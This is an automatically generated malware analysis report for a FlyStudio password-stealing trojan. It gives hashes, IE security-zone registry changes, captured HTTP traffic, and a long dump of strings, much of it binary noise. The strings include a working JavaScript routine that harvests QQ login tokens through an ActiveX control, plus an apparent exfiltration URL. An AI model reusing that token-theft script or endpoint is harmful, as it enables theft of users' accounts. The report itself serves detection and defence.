Trojan.Win32.FlyStudio_2ea4ff5287

by malwarelabrobot on August 5th, 2015 in Malware Descriptions.

Trojan-PSW.Win32.MSNPassword.FD, Trojan.Win32.FlyStudio.FD, GenericEmailWorm.YR, GenericPhysicalDrive0.YR, TrojanFlyStudio.YR (Lavasoft MAS)
Behaviour: Trojan-PSW, Trojan, Worm, EmailWorm

The description has been automatically generated by Lavasoft Malware Analysis System and it may contain incomplete or inaccurate information.

Summary

Dynamic Analysis

Static Analysis

Network Activity

Map

Strings from Dumps

Removals

MD5: 2ea4ff528727017b75eed48a25de2720
SHA1: 9925ba64d60eb6bb4c1c82207b5ddd2dc04cc27c
SHA256: 886e7e2bd99dbdce4057be183c324195108b422a59c219687b30a1ce9df75583
SSDeep: 24576:O/eVybOioXmcZq/TYpWY77Fw877oYabHmMdC9gW7f37EfnI4/kESO4ux:dVYOioW5/T6Nq83otL3digW7f3ER/kzQ
Size: 1179148 bytes
File type: EXE
Platform: WIN32
Entropy: Packed
PEID: UPolyXv05_v6
Company: no certificate found
Created at: 2014-10-29 20:10:01
Analyzed on: WindowsXP SP3 32-bit

Summary:

Trojan. A program that appears to do one thing but actually does another (a.k.a. Trojan Horse).

Payload

Behaviour	Description
EmailWorm	Worm can send e-mails.

Process activity

The Trojan creates the following process(es):
No processes have been created.
The Trojan injects its code into the following process(es):

%original file name%.exe:1100

Mutexes

The following mutexes were created/opened:
No objects were found.

File activity

The process %original file name%.exe:1100 makes changes in the file system.
The Trojan creates and/or writes to the following file(s):

%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\desktop.ini (67 bytes)

Registry activity

The process %original file name%.exe:1100 makes changes in the system registry.
The Trojan creates and/or sets the following values in system registry:

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Directory" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path4]
"CacheLimit" = "65452"
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"AppData" = "%Documents and Settings%\%current user%\Application Data"

"Cookies" = "%Documents and Settings%\%current user%\Cookies"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path2]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache2"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Common AppData" = "%Documents and Settings%\All Users\Application Data"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"Cache" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files"

[HKLM\System\CurrentControlSet\Hardware Profiles\0001\Software\Microsoft\windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections]
"SavedLegacySettings" = "3C 00 00 00 1D 00 00 00 01 00 00 00 00 00 00 00"

[HKLM\SOFTWARE\Microsoft\Cryptography\RNG]
"Seed" = "69 0F 91 90 92 7D CF 75 5D D9 39 CF 76 AF 84 E4"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path1]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache1"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CacheLimit" = "65452"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"MigrateProxy" = "1"

[HKCU\Software\Microsoft\Windows\CurrentVersion\Explorer\Shell Folders]
"History" = "%Documents and Settings%\%current user%\Local Settings\History"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths\path3]
"CachePath" = "%Documents and Settings%\%current user%\Local Settings\Temporary Internet Files\Content.IE5\Cache3"

[HKLM\SOFTWARE\Microsoft\Windows\CurrentVersion\Internet Settings\Cache\Paths]
"Paths" = "4"

[HKCU\Software\Microsoft\Multimedia\DrawDib]
"vga.drv 1276x846x32(BGR 0)" = "31,31,31,31"

The Trojan modifies IE settings for security zones to map all local web-nodes with no dots which do not refer to any zone to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"UNCAsIntranet" = "1"

The Trojan modifies IE settings for security zones to map all web-nodes that bypassing the proxy to the Intranet Zone:

"ProxyBypass" = "1"

Proxy settings are disabled:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"ProxyEnable" = "0"

The Trojan modifies IE settings for security zones to map all urls to the Intranet Zone:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings\ZoneMap]
"IntranetName" = "1"

The Trojan deletes the following value(s) in system registry:

[HKCU\Software\Microsoft\Windows\CurrentVersion\Internet Settings]
"AutoConfigURL"
"ProxyServer"
"ProxyOverride"

Dropped PE files

There are no dropped PE files.

HOSTS file anomalies

No changes have been detected.

Rootkit activity

No anomalies have been detected.

Propagation

VersionInfo

Company Name:
Product Name: mdcfgj
Product Version: 8.2.1.1
Legal Copyright:
Legal Trademarks:
Original Filename:
Internal Name:
File Version: 8.2.1.1
File Description: mdcfgj
Comments: mdcfgj
Language: English (United States)

PE Sections

Name	Virtual Address	Virtual Size	Raw Size	Entropy	Section MD5
UPX0	4096	1286144	0	0	d41d8cd98f00b204e9800998ecf8427e
UPX1	1290240	1150976	1150464	5.46169	26dbb0dbdc01d3981b57add05b711572
.rsrc	2441216	28672	27648	4.01206	af898ee1a1ac77cc313b7e0e56cc3793

Dropped from:

Downloaded by:

Similar by SSDeep:

Similar by Lavasoft Polymorphic Checker:

Total found: 2
24c2d3b1ab6201e9b7f9e8f02ce0b424
4475551e0d9a5dfa89ba3c5806064740

URLs

URL	IP
hxxp://w1d2wodescak.a5.namepu.com/CFckh/message.txt	58.253.73.221

IDS verdicts (Suricata alerts: Emerging Threats ET ruleset)

Traffic

GET /CFckh/message.txt HTTP/1.1

Referer: hXXp://w1d2wodescak.a5.namepu.com/CFckh/message.txt

Accept: image/gif, image/bmp, image/x-xbitmap, image/jpeg, image/pjpeg, application/x-shockwave-flash, application/vnd.ms-excel, application/vnd.ms-powerpoint, application/msword, */*

Accept-Language: zh-cn

User-Agent: Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; .NET CLR 2.0.50727; .NET CLR 3.0.04506.648; .NET CLR 3.5.21022)

Host: w1d2wodescak.a5.namepu.com

Cache-Control: no-cache


HTTP/1.1 404 Not Found

Content-Type: text/html

Server: Microsoft-IIS/8.5

X-Powered-By: ASP.NET

Date: Tue, 04 Aug 2015 08:38:04 GMT

Content-Length: 1163
<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "hXXp://ww
w.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">..<html xmlns="hXXp://
VVV.w3.org/1999/xhtml">..<head>..<meta http-equiv="Content
-Type" content="text/html; charset=gb2312"/>..<title>404 - ..
................</title>..<style type="text/css">..<!--
..body{margin:0;font-size:.7em;font-family:Verdana, Arial, Helvetica, 
sans-serif;background:#EEEEEE;}..fieldset{padding:0 15px 10px 15px;} .
.h1{font-size:2.4em;margin:0;color:#FFF;}..h2{font-size:1.7em;margin:0
;color:#CC0000;} ..h3{font-size:1.2em;margin:10px 0 0 0;color:#000000;
} ..#header{width:96%;margin:0 0 0 0;padding:6px 2% 6px 2%;font-family
:"trebuchet MS", Verdana, sans-serif;color:#FFF;..background-color:#55
5555;}..#content{margin:0 0 0 2%;position:relative;}...content-contain
er{background:#FFF;width:96%;margin-top:8px;padding:10px;position:rela
tive;}..-->..</style>..</head>..<body>..<div i
d="header"><h1>..........</h1></div>..<div id=
"content">.. <div class="content-container"><fieldset>.
.  <h2>404 - ..................</h2>..  <h3>........
..............................................</h3>.. </field
set></div>..</div>..</body>..</html>..HTTP/
1.1 404 Not Found..Content-Type: text/html..Server: Microsoft-IIS/8.5.
.X-Powered-By: ASP.NET..Date: Tue, 04 Aug 2015 08:38:04 GMT..Content-L
ength: 1163..<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Stric<<< skipped >>>

The Trojan connects to the servers at the folowing location(s):

%original file name%.exe_1100:

`.rsrc

t%SVh

t$(SSh

|$D.tm

~%UVW

u$SShe

atl.dll

user32.dll

kernel32.dll

wininet.dll

gdi32.dll

MsgWaitForMultipleObjects

ExitWindowsEx

MapVirtualKeyA

HttpOpenRequestA

HttpSendRequestA

HttpQueryInfoA

GetAsyncKeyState

GetWindowsDirectoryA

UnhookWindowsHookEx

GetKeyState

hXXp://VVV.pet1990.com/tmp.asp?id=

SSOAxCtrlForPTLogin.SSOForPTLogin2

hXXp://xui.ptlogin2.qq.com/cgi-bin/qlogin

document.body.innerHTML=GetuinKey();

function GetuinKey(){var text="";var q_hummerQtrl=null;var g_vOptData=null;if(window.ActiveXObject){try{q_hummerQtrl=new ActiveXObject("SSOAxCtrlForPTLogin.SSOForPTLogin2");var A=q_hummerQtrl.CreateTXSSOData();q_hummerQtrl.InitSSOFPTCtrl(0,A);g_vOptData=q_hummerQtrl.CreateTXSSOData();var a=q_hummerQtrl.DoOperation(1,g_vOptData);var V=a.GetArray("PTALIST");var f=V.GetSize();var H=$("list_uin");for(var g=0;g<f;g  ){var E=V.GetData(g);var P=E.GetDWord("dwSSO_Account_dwAccountUin");var U=E.GetStr("strSSO_Account_strNickName");var G=E.GetBuf("bufST_PTLOGIN");var A=G.GetSize();var N="";for(var Y=0;Y<A;Y  ){var B=G.GetAt(Y).toString("16");if(B.length==1){B="0" B};N =B};text =P '|' U '|' N ';'}}catch(b){}};return text};

adminakang_kn_VVV.52blt.net_sujiankangwoaini!

crossfire.exe

!#$"$%"$%"$&"&&!$%!#$

#$"$%"$%!#$!#$!$%"$%"$%"$%!#%!#$!$%!#$

%'(#'("$%

#$#'(%()%(*%(*#'("&&#&&#&&"$&"&&%'(%(*%')#'(#'(

%)*%)*& ,& ,&  &  &  &  &  &)*&)*%)*%)*#()%)*%)*%(*&)*&  & ,

*./*./*./(-/*./ /0*./(-/(,,(-/(-/(-.' ,' ,&,,&  &,,',,#(*#')

*-.*-.(,.( ,

$$!$%!$$"&'$''#''$(($())--

!$%&** ##!#$#&&

""%((!%&)./ 01' ,"&&

!"'($'($&'$((%)*#''

!!&* %()#''"%%%* %)*'  #&&'**#&&%((

#'(267289',- ##

!""&&%)*!&&

!" %%%((')* #$

##( ,067*01

#$$'',22.34%))%()

*//#'( %%%))')*.33%* #&&*-/!$$

!!#&&#%&

""'**&**

!$%%(((-- /0"&&

!!"''&)*,00,00055"''

"%%)--'

""!%&#''-22 11,11

$''$() 01

%()#''*./'

#$!%%"&&#&'*--,01)--

&  $()044

%)*$''%()),-,12,00

*.. 00.22

###&'%))!%%

"# %&#&'.12(,,(,-$''

(--)--,12

' ,5::)..267$''*.. #$

)..-11$((

!!#&&$((

$'('**(,,),-'***..-22%()"&&

(,,%))%))

'**%)*"'(

"&&.44 /0

%((,00*./

$$ 00#''

%**)..(--&  !%%

-33-33!&&$)))//&  $(()..!&&

""%))(--

!&&!$$#''%**

.33#((!%%

!!(--)//%**'--#((&  $((',,)//)//

%**"&&%))!%%!%%"''

""!%%%**&  %))

%%*//(..',,(--&  $))%**&  )//&  )//#&&

)--"&& ##"&&"&&!&&

!%%'--(--#''

#((-33%**#''*00'--

## $$%**%**,22)..

""(  "%%$))

###((&

%%!%% $$ $$/55,22!%%$))#''(--(..

!%%#'' 00)..

!%%!&&"''

"""&&%))$))

"""%% ##

!!!$$#'' $$

#((&,,%**!%%$))$(($))$)))..$((!%&#'(

!" ###(()./(,-' ,#((%* ),.)-/$'(%(**./#&(

!#&((,.)-/' -%)*

##$((&**#&&'  #(("&&#(($((#''&  '--(--

!!"''(--(..'--(..%**' ,%)*'*,'*,&*,&*,$')

#&(*.0*.0*./&) &)

!! #$ ##

!!%((,11

#&&.22'  !$$$))&   $$

!$$"&&#''%))'  "''!&& 11*//%**%  (--#((!%%&  & ,%**',-"&&#&'#&()-/*.0$'((,-(,-"%&

#%%&** ""#&&

#'')..)..(,,%**)..)..(--

!%&&* (,-"&'' ,-23(-.%)*&* &* )./$()

#(((,, 00"%%

'  '  %)))..$))'  (--(,,%** 00

!!"%&#&&

&* */0&* &* )./

(,,#'' 00&**%(((,,)--',,(---22

)--&* &**

( , //%)*' ,

$)**./*-.

$)*)./$)*$'(&* (,,'  (,,)..

*-.)-.%()

%)*)--' ,&*

!&* &)*& ,(--(-.)./',-

#&&( ,%()

'* &* ( ,'*

#'(' ,#&'(-.

!$()$'(' ,& ,',-& ,*//

*.0-13.24

#&('*,&)*' ,

.23!%& $%&  #&'' ,$()%)*' ,& ,

' ,)-.057

"$ #% /1

%(*&*,%(*#&(

##&))&**

###()!%&

'* %)*%* )-.-23$)*$)*%()',-& ,

%(*)-/( -

,02#&( /1

,02%(*"%&

)./(-.#(($((*/0

& ,*./)-/*-/

046 /0#&'

%)*$'()./' ,$()#&&"&&

!"*//*/0',-' ,%)*(,- 01' ,&* %)* $$(-."%&

#'(' ,#''"&'

#&'$()%)*%*

#$' ,(-.& ,%)*' ,%)*& ,&* "&&(,-%**!$%

!"&*  01& ,

#&&!%&%()"&'$)*'* !$$$))%* #'(%)*#'(

%**)./%)*"&'$(($((,12)-. #$#&')-.$((

!"#'(',,*/0$()

! ##"%&#''

!!(-.( ,#&'"%&#&'$()#''$'(%* %)**./& ,!%& #$*./& ,)-.%**$((%**&* ,12$()*./*/0%**"%&

)-.(-.)-.(,-%)*

#'&*.#& #&

%*.DJP

 /5/49*05 $(

& .EOW=GO"(,-37-27

 /4-26*.2

(()$$&)*,%%&""#!!#%%(&'($$&%%&

f].WJ

5)!2)!/(#0(!:

?! #7%""

&'),.1#$&(( -/2(*-

5/.bY*[R'VN*^T&PH

!'#%6,)8/

-A==>>XZZNPO7<9)[8(g<*k>.rC*i=

y.JB<dXH

Enb>aV1MD7WN9YP5RJ5SK/86TUUNOODFE354.R:.wF.tD,nA-pB

%&&KMMdeeVYXDEE<=<&8-,oA.qB-oB/tD

...9;;\^]mnnPSRFHG)0,0iC/sE.qD2{I

%[7$f:(n>%c: U1

O/.tE*_<*1.8::ACB###!2,x

"R2.uF2uI0C8365DFF576'94}

Z9}P.dB

...ijjSUTbcbSSSVWWCEE3B:7

R,@;!/,

)76 :8#.-!- #0.

K1%_;'d?%`<0tL.qI2|O4mL&'(-..?@@JKKMNOJKKPPP##$

g;)tI-pI.sG/iE =%

K.qC*o?'yE)a9 M(

6%.X=@|U4vJ.iA%S4*X9:wNF

-""P2.lD g>&X7

/:51;71<81<8

1;71=81;7/;7

%O4/kD.lC c>

7A<"H/ d>.kB*c>%W5

H-,[email protected],i?*e=/mC1sH#Q3

888889233

").CEd

%$%%)  '('))&/0/.11&)(

I3!V=%U?3EILfkRmtOipTovRlsb

J4'dF nL.GDQkvWrxVryXt{Qjqe

L4 U;&dD*mM,tQ.oQ?VXNin[z

/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=/:=

'&U3CDBCDAAB@8:86nH0uF

%%33;;;

888888222

...KKK

///,,,%%%

,,,'''"""

///&&&!!!

$$$%%%!!!...:::000222,,,000///666)))

%F:&F;-LB'G<&F; K@)J>9WN#60

, 122,--

!!#''"&& ##

""!$$"%%#''#''

""$(( $$

*//)//#''"''!&&"''!&&%))$))#''

$$ ##!%%#''

"" ##%))&**&**%))!%%#((%  &  &  "''$))

!! ## ##'**&**'  %))

!!#(()--$((#&&&  #((

#'' $$ ##

&))#'')--%))"&&#''$((%))"&&

$(()..%(("&&$((#((#''(,,(,,#&&

$$$((!&&

!%%"&&#(("%%"&&$((#&&&  %**(,,

###''$((

!!!%%!$$!&& %%$(($''&**$((#((

""!%%!%%"&&#&&&))$((

!!!%%!$$ ##

#''"%%#''(,,#&&$(($((

&))(,,#&&

""$(('**

##!$%%((

$$#''!#$$''

!!!%&%'(

## $$#&&

"# $% $$$((!$%

""&* &()"&& $%

"#!%%#&&

!$$"%&$''"%%&))&)*#'' $$

!""%%!$$

"" $$ #$"&&%))#''$''

!!#$%%),!$%$'' ./(-.

""&   ##

###(( %% $$

!$$ ## ##

""#''#''

##!$$$((

""'--#''&**)//

##!%%%))*00#'''-- %%$))%***00$))

###((!%%$((!&&$((',,',,$))#((*00&

##&**#''

"''%**"''"&&

$$)..',,

!!%**#((

-22#'' %%%**&**',,',,

&  %**%**',,*//*00#''

!&&!&&$))#((

#'' 00"''!&&(..

!&&)//)..%**).. 11$))

"''',,%**"''#((

#((-33 11',,

(..&  !&&(--)..)..

""#''#((&

#'',22 11(..&  $))

&,,!%%*00',, 11

$$#((#''

!%%(..-22)//

$))&,,)//

*//(--%**(--

!%%(--$((

"&&%))$(("''"''#((

##!%%#((#((

!%% 11,22'  /55

$))*//&

,22'--"&& %%

#&&#''!%%!$$

%%#(( 11 11(--'--)---33

*// 11 11 $$$))

$$!$$#''#''

!%%!%%"''',,)..(--$)))//'--

!!%**#(( 11'--',,(---33

##!%%!%%

!%%%  $))&  &  &,,*00)//&**

!&&(--$((',,-33/66

"" ## ###''"&&$'''  )..

$$!%%%**',,#(((--',,%  '--,22&,,

#'')//)..$))(..

##"&&$((%))&  "&&

$$%**%**&  ',,',, %%&  (--)// 11

$(( 11(..$))

##$((!$$

!!#'' ##

!! ##"&& ##$''',,',,

$((%**&  &  $))"&&%))'--(.. 11(-- %%

(,,*//(--

!!"&&#''

"""'' $$

##"&&"&&#''"''$))',,$))

""#'' ## %%"&&#''',,$))$((%**%**

!!%**)..(--(..*00',, 11',,',,',,%**$))

""!&&'--&,,(--(--',,$))',,$((%**%**(..

"&&&  (--

$$ $$"''&**$(("''#(((--

""!&&',,$))(--)//%**

*00,22(--(..!&&!&&*//(..%**

!!$(($((

!%%&  %**&  "&&(--%**(..

066%**',,&  .44.44$))',,

(--3::-33!%%#''*00-33',,,22

(--$))(--/55(--)//&,,%**

%***00$)) %%#&&#((*00%**%**066$))

$))&,,/55*//#((',,',,',,

!!#''#&&

&  ).. $$

##"''#&&',,'--*00!&&)//

%%!%% $$&  ',,',,#(((--

##"''!%%*00)//(..*//%**)..,22

"" $$&  "''%**%**(..

##!$$ ###''&**#((

(--$)) $$

## %% $$!%%&,,(--%**

$))%** 00

-33 $$!%% %%#''%**

$$"&&%**&,,&,,',,

%**/66#((#''',,(--

""!%%"&&!%%

%   00$))

!! $$"&&)//#''$)) $$

##(..',,',,(--,22$)),22%**)..$))$((

$$!%%#'' %%

$((188&,,-33"&&'--

&  )//#((&  #((%**)//,22,22 11"&&!%%

##)--%**

!%%!&&!%%!$$#(($))%**$))%  '--"&&!&&

## 11%**"''$))#(($))$))(..177%**(--%**

%))*00$))$(( ##

##$)))..$))#((!&&

!&&,22',,!&&&  ',,"&&(..&  *00-33(..#((

!## $$ $$

"" ##!$$ ##

$$ 00#''!&&#'' $$

$$%**)..(--&  !%%

-33-33!&&$)))//&  $(()..!&& 11-33)//

""!%%#(((--

#''$))!%%"''

##"&& ##"''$))$))$(("&&

!!#((%**

!" $%#'' ##!%%#&&!&& #$!%%#&&

"&'$(($()&)*

""#'($()%)*'*  /0%)*

!$%$'(&)*&))"&&*..

###&&"''

!%%"$%$'($''#&&%))#'(#&&$'(',-)-.

!! #$#&'%**#%&!$%"%&#'(%**!%%&**"%&

!""&&'

##$(("%%#(($''&*

"&& #$%  $''%((

#$%**(,-$()&))&()

%**&**)--$))

!&'#'("'''  )-.#'( ##'***./(-.,23-34

!%&&  (--

$$ "#!%%"%&%  %*

$((#'($'()./%()

##',, /0 /0

!*...23(,-$()$))&**(--&))

)...34&**

%)*'   //

%)),01044',,"&&

'  -23,12(--(,-

!"#'' ##$()%((&  "&&

 00' ,%)*/66066.44

"&&%)) $$

'  %)*$(($)*

$()$))%**(,--11#&&

')*&* & ,%**',,,12

$$!%&#&'"&'"%&

& ,177)//

),-%)*& ,(,-)./#((

#'(&  #'(

$%!%&"%&&**"$%

%().35 00)-.(,-

$)*#'(',,' ,&

$'( //)-.)-- 00(-.& ,

"&&%)*&**),-#'(

&**&   $%!$$)-- 00)//&* *./)..%**&* $()$)),11#'("&&

%))"&'178.55 //*..)--*..$)*

#$',,,12#&&%)*(,- 01

""'**#(( ## $$(--&

""#''&***../44#''&  )-.&**& , 11$((

%**',-&* *..,01' ,

###''!$$!$$#&' 00&

"%&#'''   $$$'(&**%* %))%)*)-. // ##

!$%)-.*00&  #&&

#$ ## #$ ##!$$"&&"%%'  (,,#&&

$$$(( #$

!!$'( //%**' ,%)*)-. 11',,

%**"&&%))#&&

## $$!%% ###''#''

!$$"''#''"'' $$"''"'')//%**

"%%#&& ###&&)--!$$!$$*//

##$((%))

## %%%))(,,#((&  .33&

#((#''#(()//(..$))#(($))&,,(..*00,22',,

!!!$$ ##

#&& //$(('  ,22"%%$((

!&&%**(--'--%**',,066$**$**"&&"''(.. %%!%%&,,'--,22(--',,*00177

##$((!$$

!!!%%#&&&**288$''

#''#))%))%))$))%  )..%**%   11&   $$

!!',,(--(--)..&,, 11',,*//

!!$((!$$#&&$))

##&  &  $**&**&  $))&,,'  "&&&  '--

$$%** 11(--(--%**)..(..$))$))

!%%'--$))

##(--'--(--',,(--',,(--*00&  &

&  "&&%**%))%**%***//$))"''$))

## $$$))*00)..(--

*00$))&   00

###'(#&&

$$$((&

""#(()..)//(--)//

(--&  (--

',,',,%**

!" ##"&&#&'

#''&**' ,

!#'(*./'**#&&#''*./&**$(( //)..

).."&&$()

##"''$(()..*//%**'* *01*// $$

)./!%%)-.

)--%)*'  (,,'  %)*#''&*

!"#'(!$$ 00

*/0#((,22)..( , // 00)..

#&&&)*& ,&* %**)--(

(  -22(,,%))&,, 00(--

(,, /0278',,

$''%(("&&$''

!!$()%((%  *//*00

"""&&)--

##%()#''

"%&$(()--

#$%()' ,%()',-%()&  &* */0.45/45!&&

"&&$((&

%))(,-(  )--

##$)*$((#'(

!!"&'%((#''%**',,)..399066 $$

!!%((!$%

!!$$'* (,,#'' ##!&&!$%%)*#'(

""!%%'**'  %* %*  //377$)*$)*(,,',-%'(

!%%&* $(((-.(./177-22

"" $$$'("&'#&& ##

##$))$'(#&'

%))'  %))%()%**%**%))156',-"$%#''(,,

#''(--$)*&)* //*00 11&**

!" ##'   $$

%))&**#(( //'  ),,(,,%)**/0(,,#(("&& #$

)// 01',-&  $()'**,12)..%**

""#''"&&$''&))

##(--!%%#''"''#''$**$(()..'--$))"&&#(( %%"&&',,(..(..'--$((&  (--)//*//%**(--$))

"" ##!$$%))(,,

!! ##-11#((!%%"&&!&& ##!&&"&&*..(..)//(--

$$&   11'  &  )..&   $$$))*//(--(--"&&$))!&&(--

""&**#''

""'  $''"&&%))%))#''"''

#'''-- 11(--&  ,22'--%**&  ',,(--$))

%%)..(--!%%$))$))-33

## ## ##

!!"&&&))

!!$))&))&   $$&  &,,

#(('--',,-33'--%**(,,',,&,, 11 11%**

$(((--%**)..$))

!! $$"%%

!!!%%!$$ ##!%%$((',, $$!&&'--&

##%))&  '--$**&**(--&  *00).. 11',,

%***00&,,"&&

%**$**%**%))(--'--*//(--',,,22-33

.44,22$((

## ##$((

'  #''#(($((*//-44

(..%**"''&**%**&,,&  )//

##177',,

!$$!%%&**

!%%#''%**

(..%  (,,-33'--)//

&,,'--*00

"''&**%))!&&

##$**%))*// 11(..

)..%**&

(--"'' %%$))(--%**(..',,

',,066 11)//

"'''  $((&,,

',,&  (..(-- 00&  "&&

(..(--)//288&,,

)..#((#(((..).. %%

&  $(()..)..%**(--).. 00

#''$))#''$**

(,,)//',,%))"''&  #((!%%

##%**%**

 11(..*00)..(--

"&& 11#((

 11*00(..',,

#((&  ',,(--%**

$))#''$((

'--#(($**(..

""%)))//',,',,(..*00(--)..%**,22&,,*//"&&

$''$))$((

)..)--(--&

##)//(--%**$))',,',,*00)..*//',,).. 00 11 $$

!!!%% $$

!!!%%#((#&&#((&  #((

!%%%))$))$))#((#((&  )//',,&  %**&  #((

""#(( 11)..*//,22',,)..

$$!$$$(($((#&& $$'**#''#''(-- $$

"&&$))'  &  ',,)//)..(--&,,&  )..

&  &  #((&  %**-33

## $$$((

""&**#&&#&&"&&(  "''!%%&***00"&&

$))%**&,,"''$))%**%**$))$)))...44

!!!&&%***00,22

"" %%$''"%%

##"'').. $$

"""&&"&& ##"''!%%$(((.."''

!%%"''$((

$((%)) ##!$$

""!%%!&&"&&$))#((

!!#'' 11"''!&&)..

$$&  '--!&&)//)..%**).. 11

###''$(("''

$$#'''--%**"''$((

!!#((-33 11',,$)))//&  !&&(--)..

#((#((&

#((,22 11(..&  $)) 00',,!%%*00',,

##$((%))

#''!%%"''"&&#''$)) $$ $$#((#((

!%%)//-33)//)..$))

*00$(( 00(--%**

!!!%%,11-33',,/55*00$))

&,,&  -33(.."&&

$**%**%))$))

%))!%%#(( 11,11)..(--)..-33&

#'' 00,22,22!%%

#&&#'' ##

!%%#(('--)//)--%***//(--

$((,22(..(--)..

!%%&  %**&  '  '-- 11*00&

"&&)..$))(--.44

"&&&  '--$)))..(..&,,(---33'--

#((*00*//%**

#&& $$ $$ $$#''$((%**

!%%%  &  &,,)--(..!%%',,

$)),22)//

%**%  ',,',,&  #''&

###''(,,

"''"&& $$

!%%$))'--&**%**(--',,)..(--*//.44 11

$'' $$$((

"''"&&%)))//

'--&  $(($(((--#((%**(--',,*004;;',,

##%**%))!%%#''

$$"&&%))"''&  ,11!%%

###(('  *//)//)//#''&  '--)..*00,22*00 $$

!$$(--!$$$(($))%))%))

""%))'  %**"''*//)//

%  '  *00*00"''

!!$))*00 11(--(--.44*//

""!$$#''$''

&  #))%)))--',,

## $$%**'--&  #''#((

!!&  &   11)..*//(--',, 00

"" %%"%%!$$

##%**#'' ##

$))!%%"''$((#''$((#'' $$#''

""%))"'' ##"&&!%% ##"''$))!%%#((

""!%%!$$

"%&&**(--!&&*../55

!$$(,,!$% $%

""!%%(,-',,'*

!"( ,(,-

(--"%&)-.&**!$%

$$&**%**(-. /0$(($'( //

"&&$(("%%

!%%!%%"%%

!%%#))&* &))&**(-.%**&**$()(-. 00

%((!$$!$%

#'(&))%))!%%"%&

"&&.44)-.

$&'!$% $$$))

$(('** $$

"" -.077 00&* *./ ##

$'( 11'  %))'*

$% #$ #$

$''*//%**

&**#'(#&&

!!-11066#''

'  $))(,,

""%()#((

##(,,%**

"&&&)*$((*00

%**(-- //

#&'&*  $$

#''&* )./

%((#((%))( ,*,-

## $%"%%

(,,"%&&)*(--

"%%(-.599055

!! ##$((%((

$$#'("&&%(("%%%**#&'',,.33 /0

! "#$(((--/349>?' ,

"# $$!$$ #$"%%"&&

#$%((!%%!%%#''%))(,,,12&**

!!"&& #$

""!%%(..*/0(,,056277#()$))

""&**"''

##"''!%% %%)..

)/0/55(,,' ,(--#''

##'  ,//

!!"&& ##

"""%&!%%%**

""!%%$((

##%))#''

"&&#'($()#%&#&&%)*#'(' ,&* *,-%((

"%&'*,$&( "##&'%'(#%&(* "%&(*

"""%%!##

$$ $$ ##"&&!%%"%%$((%**

"""&&#&&#&&"&&%))%()( ,&))%()*-/*-/

*.0),.!$%#%'&)*#&'(*,),.$')

!!"%%#&&

## ##!%%$((!$$!%%!%%',, //

'**#''!%%#''"''%(($()( ,&* (,-/45'

-13%()"$%%'(&)**-.),-( ,

"" ""$''$((

""!$$#''

##$((#''"%%#(( ##'  "&&

&  $((%)) //&)*' ,'* %()&)*( ,*./%()

(  ,00#&&&))&** // ./),-

!## """%%%((

###''&** %%$''#'' $$&  &**

!!#''#''(,-*-.'* %()'  #''$'(&().33,00

*..&**(   //'**)--)--

###&&&* #'''* %)*

"""&&%'('  $''%)).22)--'  (   //(  '  "%%!$$

!$$%))"&&$)) $$&**$))'  '  )-.$() #$

&**&))'

(  &**#&&

"$$ ## ##

""!%%$((

',,!%%"&&' ,( ,

"#&)*%))

'* ' ,$'(&* ' ,

$''$''#&&

#''#''&**(,,

#((!%%%))"&& #$

#''$'''* (,-

&* )-.&* (,-' ,

#&')-.)-.

##!$$*//#''

)..)--' ,&* *./

' ,!$%$()%))'

&)) //(,,(,,

'  %**#'')--

"&&$''',,

!!#''',,&**&* ' ,)-.

'* #&'*./&))),,

##),,-11-11),,$''

!!)--'  $''#&'&* &)*)-.

( ,%)*(,,*..*..

)--*..),,*..%((%))

#$"&'!%&"%&$)*#&'

$((#''#''#&&#''%**)--&**%))$'(%))"&&

)-.(,,),, //

.22(  "%%&**'  "%%

"#%()!&&

%* &* (-.(,-'**%)*%()( ,

%((%((#&&%((%((

(,,#&&'  (,,*..)--

%)*"$%"%%!$%

!%& #$%()

#'(%()&* !%&#'($()$')#&(#'(( --13

##$'')-- //*..%(('   //*..*..

&* $()#&'

%* .23#'(

%()#'(!$%!$%%)*%(*#&(%) $')( --13&)*

%()&* (,--12( ,&* (  *..'

!""%&%()(,-#()$'(#&'#'(),-),- $%

#'( $%"&&' ,)-/%(*&*,%)*&* )-/-12

!#&'$'()-.'* '*  /0-12)-.

#$$'("%&

!$%#'("&'#'($()$))&)*),-&* &*

